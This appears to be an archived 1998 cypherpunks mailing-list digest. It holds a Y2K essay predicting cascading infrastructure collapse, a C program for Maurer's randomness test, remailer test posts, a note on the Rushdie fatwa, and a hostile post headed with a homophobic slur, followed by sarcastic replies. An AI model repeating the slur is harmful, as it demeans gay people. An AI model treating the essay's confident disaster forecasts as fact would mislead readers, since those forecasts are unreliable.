     The economic impacts for the global economy are enormous and 
unknown. The Gartner Group projects that the total cost of
     dealing with Y2K worldwide will be somewhere between $300 billion to 
$600 billion -- and these are only direct costs
     associated with trying to remedy the problem. (These estimates keep 
rising every quarter now.) The Office of Management
     and Budget (OMB), in a recently released Quarterly Report, estimated 
total government Y2K expense at $3.9 billion. This
     figure was based only on federal agency estimates; the OMB warned 
that this estimate might be as much as 90% too low
     considering the increasing labor shortage and expected growing 
remediation costs as January 1, 2000 looms nearer. And in
     June of this year, it was announced that federal agencies had 
already spent five billion dollars. Of twenty-four agencies,
     fifteen reported being behind schedule. 

     These numbers don't consider the loss of output caused by diverting 
resources to forestall this crisis. In more and more
     businesses, expenditures for R&D and modernization are being 
diverted to Y2K budgets. Business Week in March of 1998
     estimated that the Year 2000 economic damage alone would be $119 
billion. When potential lawsuits and secondary effects
     are added to this -- people suing over everything from stalled 
elevators to malfunctioning nuclear power plants -- the cost
     easily could be over $1 trillion. 

     But these problems and estimates don't begin to account for the 
potential impact of Y2K. The larger significance of this bomb
     becomes apparent when we consider the next circle of the global 
network-- the organizational relationships that technology
     makes possible. 

Who works with whom? 

     The global economy is dependent upon computers both directly and 
indirectly. Whether it's your PC at home, the workstation
     on a local area network, or the GPS or mobile telephone that you 
carry, all are integral parts of larger networks where
     computers are directly connected together. As we've learned, failure 
in a single component can crash the whole system; that
     system could be an automobile, a train, an aircraft, an electric 
power plant, a bank, a government agency, a stock exchange, an
     international telephone system, the air traffic control system. If 
every possible date-sensitive hardware and software bug
     hasn't been fixed in a larger system, just one programming glitch or 
one isolated chip potentially can bring down the whole
     thing. 

     While there isn't enough time or technical people to solve the Y2K 
problem before the end of next year, we might hope that
     critical aspects of our infrastructure are tackling this problem 
with extreme diligence. But this isn't true. America's electric
     power industry is in danger of massive failures, as described in 
Business Week's February '98 cover story on Y2K. They
     report that "electric utilities are only now becoming aware that 
programmable controllers -- which have replaced mechanical
     relays in virtually all electricity-generating plants and control 
rooms -- may behave badly or even freeze up when 2000
     arrives. Many utilities are just getting a handle on the problem." 
It's not only nuclear power plants that are the source of
     concern, although problems there are scary enough. In one Year 2000 
test, notes Jared S.Wermiel, leader of the Y2K effort
     at the Nuclear Regulatory Commission, the security computer at a 
nuclear power plant failed by opening vital areas that are
     normally locked. Given the complexity and the need to test, "it 
wouldn't surprise me if certain plants find that they are not
     Year 2000-ready and have to shut down."8 

     Other electric utility analysts paint a bleaker picture. Rick 
Cowles, who reports on the electric utility industry, said at the
     end of February: "Not one electric company [that he had talked to] 
has started a serious remediation effort on its embedded
     controls. Not one. Yes, there's been some testing going on, and a 
few pilot projects here and there, but for the most part it is
     still business-as-usual, as if there were 97 months to go, not 97 
weeks.9 After attending one industry trade show, Cowle
     stated that, "Based on what I learned at DistribuTECH '98, I am 
convinced there is a 100% chance that a major portion of the
     domestic electrical infrastructure will be lost as a result of the 
Year 2000 computer and embedded systems problem. The
     industry is fiddling whilst the infrastructure burns." 10

     The Federal Aviation Administration is also very vulnerable but 
quite optimistic. "We're on one hand working to get those
     computers Year 2000 compliant, but at the same time we're working on 
replacing those computers," said Paul Takemoto, a
     spokesman for the FAA in early '98. At the twenty Air Route Traffic 
Control Centers, there is a host computer and a backup
     system. All forty of these machines --mid-'80s vintage IBM 3083 
mainframes--are affected. And then there are the satellites
     with embedded chips, individual systems in each airplane, and air 
traffic control systems around the globe. Lufthansa already
     has announced it will not fly its aircraft during the first days of 
2000. 

Who else is affected? 

     But the interdependency problem extends far beyond single 
businesses, or even entire industries. Indirect relationships
     extend like tentacles into many other networks, creating the 
potential for massive disruptions of service. 

     Let's hope that your work organization spends a great deal of money 
and time to get its entire information system compliant.
     You know yours is going to function. But on the second of January 
2000 the phone calls start. It's your banker. "There's
     been a problem," he says. They've lost access to your account 
information and until they solve the problem and get the backup
     loaded on the new system, they are unable to process your payroll. 
"We don't have any idea how long it will take," the
     president says. 

     Then someone tells you that on the news there's a story that that 
the whole IRS is down and that they can neither accept nor
     process tax information. Social Security, Federal Housing, 
Welfare-none of these agencies are capable of issuing checks
     for the foreseeable future. Major airlines aren't flying, waiting to 
see if there is still integrity in the air traffic control
     system. And manufacturing across the country is screeching to a halt 
because of failures in their supply chain. (After years
     of developing just in time (JIT) systems, there is no inventory on 
hand-suppliers have been required to deliver parts as
     needed. There is no slack in these systems to tolerate even minor 
delivery problems.) Ground and rail transport have been
     disrupted, and food shortages appear within three to six days in 
major metropolises. Hospitals, dealing with the failure of
     medical equipment, and the loss of shipments of medicine, are forced 
to deny non-essential treatment, and in some cases are
     providing essential care in pre-technical ways. 

     It's a rolling wave of interdependent failures. And it reaches 
across the country and the world to touch people who, in most
     cases, didn't know they were linked to others. Depending on what 
systems fail, very few but strategically placed failures would
     initiate a major economic cascade. Just problems with power 
companies and phone systems alone would cause real havoc.
     (This spring, a problem in ATT rendered all credit card machines 
useless for a day. How much revenue was lost by
     businesses?) If only twenty percent of businesses and government 
agencies crash at the same time, major failures would
     ensue. 

     In an interdependent system, solving most of the problem is no 
solution. As Y2K reporter Ed Meagher describes: 

          It is not enough to solve simply "most of these problems." The 
integration of these systems requires that we
          solve virtually all of them. Our ability as an economy and as a 
society to deal with disruptions and breakdowns
          in our critical systems is minuscule. Our worst case scenarios 
have never envisioned multiple, parallel
          systemic failures. Just in time inventory has led to just in 
time provisioning. Costs have been squeezed out of
          all of our critical infrastructure systems repeatedly over time 
based on the ubiquity and reliability of these
          integrated systems. The human factor, found costly, slow, and 
less reliable has been purged over time from our
          systems. Single, simple failures can be dealt with; complex, 
multiple failures have been considered too remote
          a possibility and therefore too expensive to plan for. 11 

     The city of New York began to understand this last September. The 
governor of New York State banned all nonessential IT
     projects to minimize the disruption caused by the year 2000 bomb 
after reading a detailed report that forecasts the
     millennium will throw New York City into chaos, with power supplies, 
schools, hospitals, transport, and the finance sector
     likely to suffer severe disruption. Compounding the city's Y2K risks 
is the recent departure of the head of its year 2000
     project to a job in the private sector.12 

     But of course the anticipated problems extend far beyond U.S. 
shores. In February, the Bangkok Post reported that Phillip
     Dodd, a Unysis Y2K expert, expects that upward of 70% of the 
businesses in Asia will fail outright or experience severe
     hardship because of Y2K. The Central Intelligence Agency supports 
this with their own analysis: "We're concerned about
     the potential disruption of power grids, telecommunications and 
banking services, among other possible fallout, especially in
     countries already torn by political tensions."13 

     A growing number of assessments of this kind have led Dr. Edward 
Yardeni, the chief economist of Deutsche Morgan
     Grenfell, to keep raising the probability of a deep global recession 
in 2000-2001 as the result of Y2K. His present estimate of
     the potential for such a recession now hovers at about 70%, up from 
40% at the end of 1997.14 

How might we respond? 

(To be continued...)

<http://www.wfs.org/year2k.htm>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.HDC.NET>
Date: Sat, 26 Sep 1998 15:15:31 +0800
To: cypherpunks@cyberpass.net
Subject: The Year 2000: Social Chaos or Social Transformation? (Part 2)
Message-ID: <360D6406.45F0@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



How might we respond? 

     As individuals, nations, and as a global society, do we have a 
choice as to how we might respond to Y2K, however problems
     materialize? The question of alternative social responses lies at 
the outer edges of the interlocking circles of technology and
     system relationships. At present, potential societal reactions 
receive almost no attention. But we firmly believe that it is the
     central most important place to focus public attention and 
individual ingenuity. Y2K is a technology-induced problem, but it
     will not and cannot be solved by technology. It creates societal 
problems that can only be solved by humans. We must begin
     to address potential social responses. We need to be engaged in this 
discourse within our organizations, our communities,
     and across the traditional boundaries of competition and national 
borders. Without such planning, we will slide into the Year
     2000 as hapless victims of our technology. 

     Even where there is some recognition of the potential disruptions or 
chaos that Y2K might create, there's a powerful dynamic
     of secrecy preventing us from engaging in these conversations. 
Leaders don't want to panic their citizens. Employees don't
     want to panic their bosses. Corporations don't want to panic 
investors. Lawyers don't want their clients to confess to anything.
     But as psychotherapist and information systems consultant Dr. 
Douglass Carmichael has written: 

          Those who want to hush the problem ("Don't talk about it, 
people will panic", and "We don't know for sure.")
          are having three effects. First, they are preventing a more 
rigorous investigation of the extent of the problem.
          Second, they are slowing down the awareness of the intensity of 
the problem as currently understood and the
          urgency of the need for solutions, given the current assessment 
of the risks. Third, they are making almost
          certain a higher degree of ultimate panic, in anger, under 
conditions of shock.15 

     Haven't we yet learned the consequences of secrecy? When people are 
kept in the dark, or fed misleading information, their
     confidence in leaders quickly erodes. In the absence of real 
information, people fill the information vacuum with rumors and
     fear. And whenever we feel excluded, we have no choice but to 
withdraw and focus on self-protective measures. As the veil of
     secrecy thickens, the capacity for public discourse and shared 
participation in solution-finding disappears. People no longer
     believe anything or anybody-we become unavailable, distrusting and 
focused only on self-preservation. Our history with the
     problems created by secrecy has led CEO Norman Augustine to advise 
leaders in crisis to: "Tell the truth and tell it fast."16 

     Behaviors induced by secrecy are not the only human responses 
available. Time and again we observe a much more positive
     human response during times of crisis. When an earthquake strikes, 
or a bomb goes off, or a flood or fire destroys a
     community, people respond with astonishing capacity and 
effectiveness. They use any available materials to save and rescue,
     they perform acts of pure altruism, they open their homes to one 
another, they finally learn who their neighbors are. We've
     interviewed many people who participated in the aftermath of a 
disaster, and as they report on their experiences, it is clear
     that their participation changed their lives. They discovered new 
capacities in themselves and in their communities. They
     exceeded all expectations. They were surrounded by feats of caring 
and courage. They contributed to getting systems restored
     with a speed that defied all estimates. 

     When chaos strikes, there's simply no time for secrecy; leaders have 
no choice but to engage every willing soul. And the field
     for improvisation is wide open-no emergency preparedness drill ever 
prepares people for what they actually end up doing.
     Individual initiative and involvement are essential. Yet 
surprisingly, in the midst of conditions of devastation and fear, people
     report how good they feel about themselves and their colleagues. 
These crisis experiences are memorable because the best of
     us becomes visible and available. We've observed this in America, 
and in Bangladesh, where the poorest of the poor
     responded to the needs of their most destitute neighbors rather than 
accepting relief for themselves. 

     What we know about people in crisis 

          shared purpose and meaning brings people together 
          people display unparalleled levels of creativity and 
resourcefulness 
          people want to help others - individual agendas fade 
immediately 
          people learn instantly and respond at lightning speed 
          the more information people get, the smarter their responses 
          leadership behaviors (not roles) appear everywhere, as needed 
          people experiment constantly to find what works 

Who might we become? 

     As we sit staring into the unknown dimensions of a global crisis 
whose timing is non-negotiable, what responses are available
     to us as a human community? An effective way to explore this 
question is to develop potential scenarios of possible social
     behaviors. Scenario planning is an increasingly accepted technique 
for identifying the spectrum of possible futures that are
     most important to an organization or society. In selecting among 
many possible futures, it is most useful to look at those that
     account for the greatest uncertainty and the greatest impact. For 
Y2K, David Isenberg, (a former AT&T telecommunications
     expert, now at Isen.Com) has identified the two variables which seem 
obvious - the range of technical failures from isolated to
     multiple, and the potential social responses, from chaos to 
coherence. Both variables are critical and uncertain and are
     arrayed as a pair of crossing axes, as shown in Figure 2. When 
displayed in this way, four different general futures emerge.
     In the upper left quadrant, if technical failures are isolated and 
society doesn't respond to those, nothing of significance will
     happen. Isenberg labels this the "Official Future" because it 
reflects present behavior on the part of leaders and
     organizations. 

                               Figure 2.

     The upper right quadrant describes a time where technical failures 
are still isolated, but the public responds to these with
     panic, perhaps fanned by the media or by stonewalling leaders. 
Termed "A Whiff of Smoke," the situation is analogous to the
     panic caused in a theater by someone who smells smoke and spreads an 
alarm, even though it is discovered that there is no
     fire. This world could evolve from a press report that fans the 
flames of panic over what starts as a minor credit card glitch
     (for example), and, fueled by rumors turns nothing into a major 
social problem with runs on banks, etc. 

     The lower quadrants describe far more negative scenarios. 
"Millennial Apocalypse" presumes large-scale technical failure
     coupled with social breakdown as the organizational, political and 
economic systems come apart. The lower left quadrant,
     "Human Spirit" posits a society that, in the face of clear 
adversity, calls on each of us to collaborate in solving the problems of
     breakdown.

     Since essentially we are out of time and resources for preventing 
widespread Y2K failures, a growing number of observers
     believe that the only plausible future scenarios worth contemplating 
are those in the lower half of the matrix. The major
     question before us is how will society respond to what is almost 
certain to be widespread and cascading technological
     failures? 

                               Figure 3.

     Figure 3 above shows a possible natural evolution of the problem. 
Early, perhaps even in '98, the press could start something
     bad long before it was clear how serious the problem was and how 
society would react to it. There could be an interim scenario
     where a serious technical problem turned into a major social problem 
from lack of adaquate positive social response. This
     "Small Theatre Fire" future could be the kind of situation where 
people overreact and trample themselves trying to get to the
     exits from a small fire that is routinely extinguished. 

     If the technical situation is bad, a somewhat more ominous situation 
could evolve where government, exerting no clear positive
     leadership and seeing no alternative to chaos, cracks down so as not 
to lose control (A common historical response to social
     chaos has been for the government to intervene in non-democratic, 
sometimes brutal fashion. "Techno-fascism" is a plausible
     scenario -- governments and large corporations would intervene to 
try to contain the damage -- rather than build for the
     future. This dictatorial approach would be accompanied by secrecy 
about the real extent of the problem and ultimately fueled
     by the cries of distress, prior to 2000, from a society that has 
realized its major systems are about to fail and that it is too late
     to do anything about it. 

Collaboration is our only choice 

     Obviously, the scenario worth working towards is "Human Spirit," a 
world where the best of human creativity is enabled and
     the highest common good becomes the objective. In this world we all 
work together, developing a very broad, powerful,
     synergistic, self-organizing force focused on determining what 
humanity should be doing in the next 18 months to plan for
     the aftermath of the down stroke of Y2K. This requires that we 
understand Y2K not as a technical problem, but as a systemic,
     worldwide event that can only be resolved by new social 
relationships. All of us need to become very wise and very engaged
     very fast and develop entirely new processes for working together. 
Systems issues cannot be resolved by hiding behind
     traditional boundaries or by clinging to competitive strategies. 
Systems require collaboration and the dissolution of existing
     boundaries. Our only hope for healthy responses to Y2K-induced 
failures is to participate together in new collaborative
     relationships. 

     At present, individuals and organizations are being encouraged to 
protect themselves, to focus on solving "their" problem. In
     a system's world, this is insane. The problems are not isolated, 
therefore no isolated responses will work. The longer we
     pursue strategies for individual survival, the less time we have to 
create any viable, systemic solutions. None of the
     boundaries we've created across industries, organizations, 
communities, or nation states give us any protection in the face of
     Y2K. We must stop the messages of fragmentation now and focus 
resources and leadership on figuring out how to engage
     everyone, at all levels, in all systems. 

     As threatening as Y2K is, it also gives us the unparalleled 
opportunity to figure out new and simplified ways of working
     together. GM's chief information officer, Ralph Szygenda, has said 
that Y2K is the cruelest trick ever played on us by
     technology, but that it also represents a great opportunity for 
change.17   It demands that we let go of traditional boundaries
     and roles in the pursuit of new, streamlined systems, ones that are 
less complex than the entangled ones that have evolved over
     the past thirty years. 

     There's an interesting lesson here about involvement that comes from 
the Oklahoma City bombing in 1995. Just a few weeks
     prior the bombing, agencies from all over the city conducted an 
emergency preparedness drill as part of normal civil defense
     practice. They did not prepare themselves for a bomb blast, but they 
did work together on other disaster scenarios. The most
     significant accomplishment of the drill was to create an invisible 
infrastructure of trusting relationships. When the bomb
     went off, that infrastructure displayed itself as an essential 
resource--people could work together easily, even in the face of
     horror. Many lives were saved and systems were restored at an 
unprecedented rate because people from all over the
     community worked together so well. 

     But there's more to this story. One significant player had been 
excluded from the preparedness drill, and that was the FBI. No
     one thought they'd ever be involved in a Federal matter. To this 
day, people in Oklahoma City speak resentfully of the manner
     in which the FBI came in, pushed them aside, and offered no 
explanations for their behavior. In the absence of trusting
     relationships, some form of techno-fascism is the only recourse. 
Elizabeth Dole, as president of the American Red Cross
     commented: "The midst of a disaster is the poorest possible time to 
establish new relationships and to introduce ourselves to
     new organizations . . . . When you have taken the time to build 
rapport, then you can make a call at 2 a.m., when the river's
     rising and expect to launch a well-planned, smoothly conducted 
response."18 

     The scenario of communities and organizations working together in 
new ways demands a very different and immediate
     response not only from leaders but from each of us. We'd like to 
describe a number of actions that need to begin immediately. 

What leaders must do 

     We urge leaders to give up trying to carry this burden alone, or 
trying to reestablish a world that is irretrievably broken. We
     need leaders to be catalysts for the emergence of a new world. They 
cannot lead us through this in traditional ways. No leader
     or senior team can determine what needs to be done. No single group 
can assess the complexity of these systems and where
     the consequences of failure might be felt. The unknown but complex 
implications of Y2K demand that leaders support
     unparalleled levels of participation-more broad-based and inclusive 
than ever imagined. If we are to go through this crisis
     together rather than bunkered down and focused only on individual 
security, leaders must begin right now to convene us.
     The first work of leaders then, is to create the resources for 
groups to come together in conversations that will reveal the
     interconnections. Boundaries need to dissolve. Hierarchies are 
irrelevant. Courageous leaders will understand that they
     must surrender the illusion of control and seek solutions from the 
great networks and communities within their domain.
     They must move past the dynamics of competition and support us in 
developing society-wide solutions. 

     Leaders can encourage us to seek out those we have excluded and 
insist that they be invited in to all deliberations. Leaders
     can provide the time and resources for people to assess what is 
critical for the organization or community to sustain-its
     mission, its functions, its relationships, its unique qualities. 
>From these conversations and plans, we will learn to know one
     another and to know what we value. In sudden crises, people 
instantly share a sense of meaning and purpose. For Y2K, we have
     at least a little lead time to develop a cohesive sense of what 
might happen and how we hope to respond.

     Secrecy must be replaced by full and frequent disclosure of 
information. The only way to prevent driving people into isolated
     and self-preserving behaviors is to entrust us with difficult, even 
fearsome information, and then to insist that we work
     together. 

     No leader anywhere can ignore these needs or delay their 
implementation. 

What communities must do 

     Communities need to assess where they are most vulnerable and 
develop contingency plans. Such assessment and planning
     needs to occur not just within individual locales, but also in 
geographic regions. These activities can be initiated by existing
     community networks, for example, civic organizations such as Lions 
or Rotary, Council of Churches, Chamber of Commerce,
     the United Way. But new and expansive alliances are required, so 
planning activities need quickly to extend beyond traditional
     borders. We envision residents of all ages and experience coming 
together to do these audits and planning. Within each
     community and region, assessments and contingency plans need to be 
in place for disruptions or loss of service for:

          all utilities 
          electricity, water, gas, phones 
          food supplies 
          public safety 
          healthcare 
          government payments to individuals and organizations 
          residents most at risk, e.g. the elderly, those requiring 
medications 

What organizations must do 

     Organizations need to move Y2K from the domain of technology experts 
into the entire organization. Everyone in the
     organization has something important to contribute to this work. 
Assessment and contingency plans need to focus on: 

          how the organization will perform essential tasks in the 
absence of present systems 
          how the organization will respond to failures or slowdowns in 
information and supplies 
          what simplified systems can be developed now to replace 
existing ones 
          relationships with suppliers, customers, clients, 
communities-how we will work together 
          developing systems to ensure open and full access to 
information 

     The trust and loyalty developed through these strategic 
conversations and joint planning will pay enormous dividends later on,
     even if projected breakdowns don't materialize. Corporate and 
community experience with scenario planning has taught a
     important principle: We don't need to be able to predict the future 
in order to be well-prepared for it. In developing scenarios,
     information is sought from all over. People think together about its 
implications and thus become smarter as individuals and
     as teams. Whatever future then materializes is dealt with by people 
who are more intelligent and who know how to work well
     together. 

     And such planning needs to occur at the level of entire industries. 
Strained relationships engendered by competitive
     pressures need to be put aside so that people can collaboratively 
search for ways to sustain the very fabric of their industry.
     How will power grids be maintained nationally? Or national systems 
of food transport? How will supply chains for
     manufacturing in any industry be sustained?

What you can do 

     We urge you to get involved in Y2K, wherever you are, and in 
whatever organizations you participate. We can't leave this
     issue to others to solve for us, nor can we wait for anyone else to 
assert leadership. You can begin to ask questions; you can
     begin to convene groups of interested friends and colleagues; you 
can engage local and business leaders; you can educate
     yourself and others (start with www.Year2000.com and www.Y2K.com for 
up-to-date information and resources.) This is our
     problem. And as an African proverb reminds us, if you think you're 
too small to make a difference, try going to bed with a
     mosquito in the room. 

The crisis is now 

     There is no time left to waste. Every week decreases our options. At 
the mid-May meeting of leaders from the G8, a
     communiqu was issued that expressed their shared sensitivity to the 
"vast implications" of Y2K, particularly in "defense,
     transport, telecommunications, financial services, energy, and 
environmental sectors," and the interdependencies among
     these sectors. (Strangely, their list excludes from concern 
government systems, manufacturing and distribution systems.)
     They vowed to "take further urgent action" and to work with one 
another, and relevant organizations and agencies. But no
     budget was established, and no specific activities were announced. 
Such behavior-the issuing of a communiqu, the promises
     of collaboration and further investigation-are all too common in our 
late 20th century political landscape. 

     But the earth continues to circle the sun, and the calendar 
relentlessly progresses toward the Year 2000. If we cannot
     immediately change from rhetoric to action, from politics to 
participation, if we do not immediately turn to one another and
     work together for the common good, we will stand fearfully in that 
new dawn and suffer consequences that might well have
     been avoided if we had learned to stand together now. 

Copyright 1998 John L. Petersen, Margaret Wheatley, Myron Kellner-Rogers 
(posted with permission)



     John L. Petersen is president of The Arlington Institute, a 
Washington DC area research institute. He is a futurist who
     specializes in thinking about the long range security implications 
of global change. He is author of the award winning book,
     The Road to 2015: Profiles of the Future and his latest book is Out 
of the Blue - Wild Cards and Other Big Future Surprises,
     which deals with potential events such as Y2K. He can be reached at 
703-243-7070 or johnp@arlinst.org 

     Margaret Wheatley and Myron Kellner-Rogers are authors and 
consultants to business. A Simpler Way, their book on
     organizational design was published in 1997. Dr. Wheatley's previous 
book, Leadership & the New Science, was recently
     named one of the 10 best management books ever, and it also was 
voted best management book in 1992 in Industry Week, and
     again in 1995 by a syndicated management columnist. Their consulting 
work takes them these days to Brazil, Mexico, South
     Africa, Australasia and Europe. In the States, they've worked with a 
very wide array of organizations. 



1 See Peter de Jager, www.year2000.com 

2 United Airlines, Flight Talk Network, February 1998 

3 "Slow Knowledge," _______1997. 

4 See "The Complexity Factor" by Ed Meagher at 
www.year2000.com/archive/NFcomplexity.html

5 "Industry Wakes Up to the Year 2000 Menace," Fortune, April 27, 1998 

6 The Washington Post, "If Computer Geeks Desert, IRS Codes Will Be 
ciphers," December 24, 1997 

7 Business Week, March 2, 1998 

8 www.igs.net/~tonyc/y2kbusweek.html 

9 "Industry Gridlock," Rick Cowles, February 27, 1998, 
www.y2ktimebomb.com/PP/RC/rc9808.htm 

10 Cowles, January 23, 1998, ibid www site 

11 The Complexity Factor, Ed Meagher 

12 www.computerweekly.co.uk/news/ll_9_97 

13 REUTER "CIA:Year 2000 to hit basic services: Agency warns that many 
nations aren't ready for disruption," Jim Wolf, May 7, 1998 

14 see http://www.Yardeni.com 

15  www.tmn.com/~doug

16 "Managing the Crisis You Tried to Prevent," Harvard Business Review, 
Nov-Dec. 1995, 158. 

17 In Fortune, April 27, 1998 

18 quoted in "Managing the Crisis You Tried to Prevent," Norman 
Augustine, Harvard Business Review, Nov-Dec 1995, 151. 



To WFS Home

<http://www.wfs.org/year2k.htm>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CSapronett@aol.com
Date: Sat, 26 Sep 1998 14:54:22 +0800
To: cypherpunks@toad.com
Subject: faggots
Message-ID: <e3e77ed.360d44f2@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



My only regret is that I wont get to watch you all burn in hell !!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sat, 26 Sep 1998 15:23:27 +0800
To: CSapronett@aol.com
Subject: Re: faggots
In-Reply-To: <e3e77ed.360d44f2@aol.com>
Message-ID: <360D7655.7B88B561@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Now there is one that isn't clueless.  Not particularly nice, but not
clueless.

PHM

CSapronett@aol.com wrote:
> 
> My only regret is that I wont get to watch you all burn in hell !!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 26 Sep 1998 18:33:04 +0800
To: coderpunks@toad.com
Subject: Ueli Maurer's Univ. Stat. Test for Rand No -in C
Message-ID: <3.0.5.32.19980926162749.0082e990@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain





/*
UELI.c

This implements Ueli M Maurer's
"Universal Statistical Test for Random Bit Generators"
using L=16

Accepts a filename on the command line;
writes its results, with other info, to stdout.

Handles input file exhaustion gracefully.

Ref: J. Cryptology v 5 no 2, 1992 pp 89-105
also on the web somewhere.

-David Honig
honig@sprynet.com


Built with Wedit 2.3, lcc-win32
http://www.cs.virginia.edu/~lcc-win32


26 Sept CP Release
Version Notes:

	This version does L=16.  It evolved from an L=8 prototype
	which I ported from the Pascal in the above reference.

	I made the memory usage reasonable
	by replacing Maurer's "block" array
	with the 'streaming' fgetc() call.


Usage:
	UELI filename
	outputs to stdout

*/

#define L 16		// bits per block
#define V (1<<L)	// number of possible blocks
#define Q (10*V)    // at LEAST 10 * V, to assure each block seen
#define K (100*Q)   // at LEAST 100 * Q, as large as possible
#define MAXSAMP (Q + K)

#include <stdio.h>
#include <math.h>


int main( int argc, char **argv )
{
FILE *fptr;
int i;
int b, c;
int table[V];
float sum=0.0;
int run;

// Human Interface
printf("UELI 26 Sep 98\nL=%d %d %d \n", L, V, MAXSAMP);
if (argc <2)
	{printf("Usage: UELI filename\n"); exit(-1); }
else
	printf("Measuring file %s\n", argv[1]);

// FILE IO
fptr=fopen(argv[1],"rb");
if (fptr == NULL) {printf("Can't find %s\n", argv[1]); exit(-1); }

// INIT
for (i=0; i<V; i++) table[i]=0;
for (i=0; i<Q; i++)	{
	b= fgetc(fptr)<<8 | fgetc(fptr);
	table[ b ]=i;
}

printf("Init done\n");

// COMPUTE
run=1;
for (i=Q;  run && i<Q+K; i++)
	{
	// COMPOSE A 16-bit quantity
	b=fgetc(fptr); if (b<0) run=0;
	c=fgetc(fptr); if (c<0) run=0;
	if (run) { b = b<<8 | c;
			sum += log( (double) ( i-table[b] ) ) ;
			table[ b ]=i;
		}
	}

	if (!run) printf("Premature end of file; read %d blocks.\n", i-Q);
	sum = (sum/( (double) (i-Q) ) ) /  log(2.0);    // i should be K if enough
samples
	printf("fTU= %f\n\n", sum);
	printf("Expected value for L=16 is 15.167379 \n");

	// Add further interpretation/thresholding of the number of sigmas from
expected,
	// and include the fudge factors explained in the paper.




} // end











  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 26 Sep 1998 19:34:15 +0800
To: cypherpunks@toad.com
Subject: Re: faggots
In-Reply-To: <e3e77ed.360d44f2@aol.com>
Message-ID: <v03130300b23333e62d71@[209.66.100.64]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:48 PM -0700 9/26/98, CSapronett@aol.com wrote:
>My only regret is that I wont get to watch you all burn in hell !!!


Oh, but you will.


--Tim May


(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sat, 26 Sep 1998 18:42:22 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <ae6d856ae4545f3a192ebcb3aba4ba0e@base.xs4all.nl>
Message-ID: <360DA54D.92364366@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> CSapronett@aol.com (note: AOL.COM -- LOL!) wrote:
> >My only regret is that I wont get to watch you all burn in hell !!!
> 
> I see.  Would you mind elaborating?  We are going to burn in hell
> because...? We don't use AOL? We like our privacy? We use cryptosystems
> that you'll never understand in your life time?  Because we know how
> to use (and create) remailers?
> 
<<snip>>
Hear!! Hear!!

And so what if we offer to kill people for answering their email, and
whose business is it but ours if we feel that soliciting baby porn is an
appropriate reaction to the insidious act of replying to a message even
if you aren't certain who it is from?

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 26 Sep 1998 12:40:56 +0800
To: cypherpunks@minder.net
Subject: test - ignore
Message-ID: <199809261743.TAA06323@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



ping




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 26 Sep 1998 13:55:59 +0800
To: cypherpunks@toad.com
Subject: Re: Test [No Reply]
In-Reply-To: <199809250323.WAA17403@einstein.ssz.com>
Message-ID: <199809261850.UAA11213@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 24 Sep 1998 22:23:38 -0500 (CDT)  Jim Choate <ravage@EINSTEIN.ssz.com> wrote:

>Test [No Reply]

And we have a winner for this weeks free AOL account!!  Well done Jim! ;-)









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 26 Sep 1998 23:56:49 +0800
To: NMIR <cypherpunks@cyberpass.net
Subject: Re: [salman rushdie]
In-Reply-To: <19980925192238.27047.qmail@www0n.netaddress.usa.net>
Message-ID: <3.0.5.32.19980926215457.00ad1510@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:22 PM 9/25/98 BST, NMIR wrote:
>Does anyone have any idea what this guy is on about?.
If you mean "Why does Bill P rant like that", not my problem.

But if you mean "Is the Fatwa against Salman Rushdie over?",
the news has been that the Iranian government has decided
to drop their ~$2M reward for killing him.  That doesn't mean
all of the mullahs have stopped calling for Muslims to
kill him for blasphemy.  But at least the government has
decided good relationships with the Brits are more important
than keeping their more fanatical fanatics happy.
Rushdie was quoted in the press as being very relieved.

If there's cypherpunks relevance to this, it's that cryptographic
privacy and digital cash payments make it easier to publish
controversial material without the threat of violence against you.

		Bill Stewart


>---
>ABQ J 9/24/98 
>Iran May Withdraw
>Writer's Death Threat
>
>LONDON - Author Salman
>Rushdie met with British Foreign
>Office officials Wednesday amid
>reports Iran is preparing to
>withdraw the threat on his life.
>The late Ayatollah Ruhollah
>Khomeini pronounced a "fatwa," death sentence, 
>against Rushdie in
>1989 after the publication of his
>book "Satanic Verses," which many
>Muslims deemed blasphemous.
>Islamic militants then put a $2
>million bounty on Rushdie's head,
>forcing the author to live largely in
>under British police protection.
>---
>
>I THINK that I heard tonight and saw 
>Rushie's picture on TV that the above
>was called off.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 27 Sep 1998 15:25:50 +0800
To: Soren <cypherpunks@cyberpass.net
Subject: Re: IP: Oh, I feel sooooo much better now.....
In-Reply-To: <199809260435.VAA11846@netcom13.netcom.com>
Message-ID: <3.0.5.32.19980926222349.00b3c100@idiom.com>
MIME-Version: 1.0
